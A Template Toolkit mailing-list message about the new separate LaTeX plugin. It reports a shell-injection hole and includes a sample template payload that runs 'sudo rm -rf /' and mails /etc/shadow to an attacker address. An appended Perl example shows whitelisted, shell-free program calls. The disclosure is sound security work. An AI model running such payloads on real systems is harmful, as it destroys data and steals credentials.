Andy Wardley wrote:
> ... It also removes the latex filter which I had broken but not
> removed in 2.15.
>
> There's also the new Template-Latex distribution available from here:
>
> http://tt2.org/download/Template-Latex-2.16.tar.gz
>
> This provides the Latex plugin which defines the latex filter which is
> no longer a core part of TT. It also contains the Template::Latex
> module, a wrapper around the Template module which pre-defines the
> filter for you and gives you some extra Latex configuration options.

Almost two years ago I made some changes to the LaTeX filter and
submitted a patch, but it did not get applied. The changes were to make
the filter optionally run the various LaTeX auxiliary programs (bibtex
and makeindex) and to rerun latex or pdflatex a number of times (or until
all cross references stabilize). There are some other changes I had in
mind like adding the directory of the template to TEXINPUTS so that the
child processes (which are run in a temporary directory) can find files
for \include and \includegraphics.

A lot of these options are potentially expensive; for example with a
document having a table of contents, an index and bibliography you could
be running latex three times to get the TOC generated, forward
references and page numbers to settle, then bibtex for the bibliography,
latex a couple of times in case the pagination changes, makeindex and
then latex one or two more times. My patch checks the output from latex
to see whether it gets the message "Label(s) may have changed" to
decide whether to re-run latex, so as to avoid unnecessary runs, but
nevertheless running the latex filter on a complex document is expensive.

I use the LaTeX filter quite a bit, so now that the LaTeX plugin has
been separated out of the main Template Toolkit distribution I will
revisit my changes and suggest how the new separate plugin could be
enhanced.

On a different issue, from a cursory scan of the new plugin I am a
little worried about security implications implied by the fact that
templates can specify the absolute paths of the latex, pdflatex and
dvips executables. This would appear to give the template writer carte
blanche to invoke any executable with the rights of the user processing
the templates. The filter does not even seem to validate these paths
for embedded whitespace or shell escapes and passes constructed command
lines to the shell (via "system"), so I could try something like:

[% USE latex(latex => 'sudo rm -rf /;',
dvips => "sudo sh -c 'mail badguy-JXiH2Qp+pBI@xxxxxxxxxxxxxxxx
</etc/shaddow';") %]

Finally, now that 2.15 is out I will have another look at the TT2 quick
reference card to update it to reflect some of the new features that
have appeared. Any comments on the card or suggestions are always welcome.

Regards
Andrew
--
Andrew Ford, Director Pauntley Prints / Ford & Mason Ltd
A.Ford-OfKrLxNBp1iX/4koqx8SDw@xxxxxxxxxxxxxxxx South Wing Compton House
pauntley-prints.co.uk Compton Green, Redmarley Tel: +44 1531 829900
ford-mason.co.uk Gloucester GL19 3JB Fax: +44 1531 829901
refcards.com cronolog.org Great Britain Mobile: +44 7785 258278
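
The shell-invocation concern raised in the message above, as an added Perl example that is not part of the original post and not code from Template-Latex: the program is looked up by name in an application-owned table and run with the list form of system, so no shell ever parses the command line. The paths and flags in %PROGRAM and the helper names resolve_program, build_command and run_program are assumptions made for illustration.

```perl
#!/usr/bin/perl
# Added example, not Template-Latex code.
use strict;
use warnings;

# Assumption: this table is owned by the application or administrator.
# Templates may only name a key; they never supply a path or a flag.
my %PROGRAM = (
    latex    => ['/usr/bin/latex',    '-interaction=batchmode'],
    pdflatex => ['/usr/bin/pdflatex', '-interaction=batchmode'],
    dvips    => ['/usr/bin/dvips',    '-q'],
);

# Hypothetical helper: map a template-supplied name to a trusted argv prefix.
sub resolve_program {
    my ($name) = @_;
    die "program name missing\n" unless defined $name;
    # Exact hash lookup: a value containing spaces, slashes, quotes or
    # semicolons is just an unknown key and is refused.
    my $entry = $PROGRAM{$name} or die "program '$name' is not allowed\n";
    return @$entry;
}

# Hypothetical helper: build the full argument list for one run.
sub build_command {
    my ($name, $file) = @_;
    my @prefix = resolve_program($name);
    # Plain file name only: no directories, no leading '-', no shell characters.
    die "bad file name\n" unless $file =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]*\z/;
    return (@prefix, $file);
}

# Hypothetical helper: run the program and return its exit status.
sub run_program {
    my @cmd = build_command(@_);
    # Indirect-object list form of system(): the list goes to execvp as-is,
    # so /bin/sh is never involved even if an argument looks like shell syntax.
    system { $cmd[0] } @cmd;
    return $? >> 8;
}

# Constructed inputs: one valid name and one injection-style value.
for my $name ('pdflatex', 'latex; echo injected') {
    my @cmd = eval { build_command($name, 'report.tex') };
    print $@ ? "rejected: $@" : "would run: @cmd\n";
}
```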